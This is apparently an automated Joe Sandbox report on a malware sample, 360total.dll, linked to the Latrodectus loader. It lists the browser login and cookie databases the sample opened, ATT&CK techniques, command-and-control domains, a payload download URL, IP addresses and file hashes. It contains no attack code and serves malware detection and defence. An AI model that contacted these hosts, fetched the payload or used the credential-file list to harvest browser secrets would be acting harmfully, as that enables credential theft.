                      Source: Yara match | File source: 00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2008946508.00000237C16B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3178827371.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3440249504.000001E3B56E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3416817098.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3264216780.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3041610792.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.2270295766.0000014614300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2008986338.00000237C16C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 180, type: MEMORYSTR
                      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                      Remote Access Functionality

                      Source: Yara match | File source: 3.2.rundll32.exe.14614300000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.146142f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.146142f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.237c16b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.14614300000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.237c16c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.237c16c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2008946508.00000237C16B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3178827371.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3440249504.000001E3B56E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3416817098.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3264216780.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000003.3041610792.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.2270295766.0000014614300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.2008986338.00000237C16C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 180, type: MEMORYSTR
                      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
                      Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
                      Execution: 131 Windows Management Instrumentation; 1 Native API; 1 Scheduled Task/Job; 12 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
                      Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 11 Windows Service; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                      Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Valid Accounts; 11 Access Token Manipulation; 11 Windows Service; 112 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; At; Cron; Launchd
                      Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 File Deletion; 1 Masquerading; 1 Valid Accounts; 13 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 112 Process Injection; 1 Rundll32; Stripped Payloads
                      Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
                      Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 28 System Information Discovery; 4101 Security Software Discovery; 13 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; 21 System Network Configuration Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
                      Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
                      Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
                      [Behavior Graph: ID: 1432373, Sample: 360total.dll.exe, Startdate: 26/04/2024, Architecture: WINDOWS, Score: 100]

                      | Source | Detection | Scanner | Label | Link |
                      |---|---|---|---|---|
                      | 360total.dll.dll | 18% | ReversingLabs | Win32.Trojan.Generic | |

                      | Source | Detection | Scanner | Label | Link |
                      |---|---|---|---|---|
                      | C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll | 18% | ReversingLabs | Win32.Trojan.Generic | |

                      No Antivirus matches
                      No Antivirus matches
                      | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                      |---|---|---|---|---|---|
                      | jarinamaers.shop | 104.21.46.75 | true | true | | unknown |
                      | pewwhranet.com | 104.21.84.207 | true | true | | unknown |
                      | grizmotras.com | 172.67.219.28 | true | true | | unknown |
                      | www.google.com | 142.250.217.228 | true | false | | high |
                      | Name | Malicious | Antivirus Detection | Reputation |
                      |---|---|---|---|
                      | https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGOKysLEGIjDP9RPIyWXG6yqz56jt32vlp9eant7g-v2niK8akWf-XW5L6XSYUi8PVE7hkJBYZJgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high |
                      | https://www.google.com/async/newtab_promos | false | | high |
                      | https://startmast.shop/live/ | true | Avira URL Cloud: safe | unknown |
                      | https://jarinamaers.shop/files/stkm.bin | true | Avira URL Cloud: safe | unknown |
                      | https://pewwhranet.com/live/ | true | Avira URL Cloud: safe | unknown |
                      | https://www.google.com/async/ddljson?async=ntp:2 | false | | high |
                      | https://grizmotras.com/live/ | true | Avira URL Cloud: safe | unknown |
                      | https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | | high |
                      | https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGOKysLEGIjCpcmGUPeBLMAxrx6A3m-HmimiV3M4DW_xd1u12h5Ub_NV02_HrDnvzsp-9u9svldcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high |
                      | https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 | false | | high |
                      | https://jarinamaers.shop/live/ | true | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 142.250.217.228 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 104.21.46.75 | jarinamaers.shop | United States | 13335 | CLOUDFLARENETUS | true |
| 172.67.219.28 | grizmotras.com | United States | 13335 | CLOUDFLARENETUS | true |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 104.21.84.207 | pewwhranet.com | United States | 13335 | CLOUDFLARENETUS | true |
                                                        IP
                                                        192.168.2.4
                                                        192.168.2.5
                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1432373
                                                        Start date and time:2024-04-26 23:14:19 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 15m 25s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:58
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Sample name:360total.dll.dll
                                                        (renamed file extension from exe to dll)
                                                        Original Sample Name:360total.dll.exe
                                                        Detection:MAL
                                                        Classification:mal100.spre.troj.spyw.evad.winDLL@90/16@10/7
                                                        EGA Information:
                                                        • Successful, ratio: 66.7%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 6
                                                        • Number of non-executed functions: 278
                                                        • Max analysis timeout: 600s exceeded, the analysis took too long
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 72.21.81.240, 192.229.211.108, 172.217.165.195, 142.251.107.84, 142.251.35.238, 34.104.35.123, 199.232.210.172, 52.182.143.212, 20.189.173.20, 142.250.217.163, 142.250.217.174
                                                        • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, self.events.data.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, update.googleapis.com, umwatson.events.data.microsoft.com, clients.l.google.com
                                                        • Execution Graph export aborted for target rundll32.exe, PID 180 because there are no executed function
                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • VT rate limit hit for: 360total.dll.dll
| Time | Type | Description |
| --- | --- | --- |
| 23:15:27 | API Interceptor | 2x Sleep call for process: WerFault.exe modified |
| 23:15:51 | API Interceptor | 34020193x Sleep call for process: rundll32.exe modified |
| 23:17:46 | API Interceptor | 2x Sleep call for process: WMIC.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name |
| --- | --- | --- | --- |
| 239.255.255.250 | https://sites.google.com/authorizewebcenter.com/565hu4?usp=sharing | malicious | HTMLPhisher |
| 239.255.255.250 | http://carajasnutricaoanimal.com | malicious | Unknown |
| 239.255.255.250 | phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.eml | malicious | HTMLPhisher |
| 239.255.255.250 | Lab5-1.docx | malicious | Unknown |
| 239.255.255.250 | Purchase Order is approved26042024.cmd | malicious | Remcos, DBatLoader |
| 239.255.255.250 | https://messageis.ru/pre/profile/message | malicious | HTMLPhisher |
| 239.255.255.250 | https://herofargwsmnncmwsrcnmwsncmwscnm.popsy.site/ | malicious | HTMLPhisher |
| 239.255.255.250 | MSG.docx | malicious | Unknown |
| 239.255.255.250 | http://trailersalesandparts.ca | malicious | Unknown |
| 239.255.255.250 | MSG.docx | malicious | Unknown |
| 104.21.84.207 | neo.msi | malicious | Latrodectus |
| 104.21.46.75 | ad.msi | malicious | Latrodectus |
| 104.21.46.75 | ad.msi | malicious | Latrodectus |
| 172.67.219.28 | neo.msi | malicious | Latrodectus |
| 172.67.219.28 | ad.msi | malicious | Latrodectus |
| 172.67.219.28 | 360total.dll.dll | malicious | Latrodectus |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| jarinamaers.shop | neo.msi | malicious | Latrodectus | 172.67.136.103 |
| jarinamaers.shop | neo.msi | malicious | Latrodectus | 104.21.46.75 |
| jarinamaers.shop | ad.msi | malicious | Latrodectus | 104.21.46.75 |
| jarinamaers.shop | Document_a19_79b555791-28h97348k5477-3219g9.js | malicious | Latrodectus | 172.67.136.103 |
| jarinamaers.shop | 360total.dll.dll | malicious | Latrodectus | 172.67.136.103 |
| jarinamaers.shop | ad.msi | malicious | Latrodectus | 104.21.46.75 |
| pewwhranet.com | neo.msi | malicious | Latrodectus | 104.21.84.207 |
| pewwhranet.com | Util.dll | malicious | Bazar Loader, Latrodectus | 172.67.197.34 |
| grizmotras.com | neo.msi | malicious | Latrodectus | 172.67.219.28 |
| grizmotras.com | ad.msi | malicious | Latrodectus | 172.67.219.28 |
| grizmotras.com | Document_a19_79b555791-28h97348k5477-3219g9.js | malicious | Latrodectus | 104.21.59.82 |
| grizmotras.com | 360total.dll.dll | malicious | Latrodectus | 172.67.219.28 |
| grizmotras.com | Util.dll | malicious | Bazar Loader, Latrodectus | 104.21.59.82 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| CLOUDFLARENETUS | http://carajasnutricaoanimal.com | malicious | Unknown | 172.67.187.174 |
| CLOUDFLARENETUS | phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.eml | malicious | HTMLPhisher | 104.17.2.184 |
| CLOUDFLARENETUS | https://messageis.ru/pre/profile/message | malicious | HTMLPhisher | 104.21.88.109 |
| CLOUDFLARENETUS | MSG.docx | malicious | Unknown | 104.17.2.184 |
| CLOUDFLARENETUS | http://trailersalesandparts.ca | malicious | Unknown | 104.17.25.14 |
| CLOUDFLARENETUS | MSG.docx | malicious | Unknown | 104.17.2.184 |
| CLOUDFLARENETUS | https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-X | malicious | HTMLPhisher | 104.21.89.211 |
| CLOUDFLARENETUS | https://doc-42.jimdosite.com/ | malicious | HTMLPhisher | 104.17.3.184 |
| CLOUDFLARENETUS | https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/ | malicious | Unknown | 104.18.12.112 |
| CLOUDFLARENETUS | https://webcompanion.com/nano_download.php? | malicious | Unknown | 104.19.208.152 |
                                                                                        https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-XGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.89.211
                                                                                        https://doc-42.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.3.184
                                                                                        https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/Get hashmaliciousUnknownBrowse
                                                                                        • 104.18.12.112
                                                                                        https://webcompanion.com/nano_download.php?Get hashmaliciousUnknownBrowse
                                                                                        • 104.19.208.152
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll | neo.msi | Get hash | malicious | Latrodectus | Browse |
 | neo.msi | Get hash | malicious | Latrodectus | Browse |
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):0.8266019060060473
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:kXFR56iKwyKyGsj94Rvm7qfkQXIDcQSc6EcEwcw3QrXaXz+HbHgSQgJjmh88WpoM:S7giKwyGP0MAaE7ji5zuiFMZ24lO8I
                                                                                            MD5:F8525B7222682BC585041BA1A85827C8
                                                                                            SHA1:F0CEE31C998E36E95D91378FB2973B9A079BD903
                                                                                            SHA-256:2B052716F3B61DCD1BEE5416FDAA98C5D19700F20E5B6B3F836A92C84E96E8A4
                                                                                            SHA-512:261DF04E7F8E582A508F58B998DF4BE0F0023F514C5AD1815F21841FDE07E2B37DAFE8A49E95BDE9F4DB5AD95EA98C29D90A23EB9860D7610994E3921FCA366F
                                                                                            Malicious:false
                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.3.9.7.2.9.3.2.1.6.5.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.3.9.7.3.0.0.1.7.0.2.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.f.8.b.d.5.3.-.9.d.4.e.-.4.9.b.1.-.a.9.c.1.-.4.4.d.b.6.d.8.8.d.7.3.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.0.6.2.b.9.1.-.9.3.c.4.-.4.7.e.4.-.8.0.8.9.-.a.e.a.5.5.4.0.e.7.a.c.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.3.6.0.t.o.t.a.l...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.3.8.-.0.0.0.1.-.0.0.1.4.-.6.3.d.7.-.2.3.d.0.1.e.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):0.8269554026159092
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Q2vawiKwyGJ0mHzmAji5zuiFMZ24lO8I:bvawiKdGqmHzdjEzuiFMY4lO8I
                                                                                            MD5:29A5F0445B234E597C8B199AA977D89B
                                                                                            SHA1:6F4B3174C6EE8EE428701DEE4941ED267BE988AA
                                                                                            SHA-256:F6A4778AF760396A2D995126B3CE9EDEAB9982EBE86C61A8BE704BD504273157
                                                                                            SHA-512:FB50BFE91E7A5A6A74B9058EDF12CE0A44D0BFC07BFE0B9E61D5137E22B4A547316F65CB4BB6F3A11872D0C2170A9A989DCAED21D5117A9A6A51D193CAE61CB8
                                                                                            Malicious:false
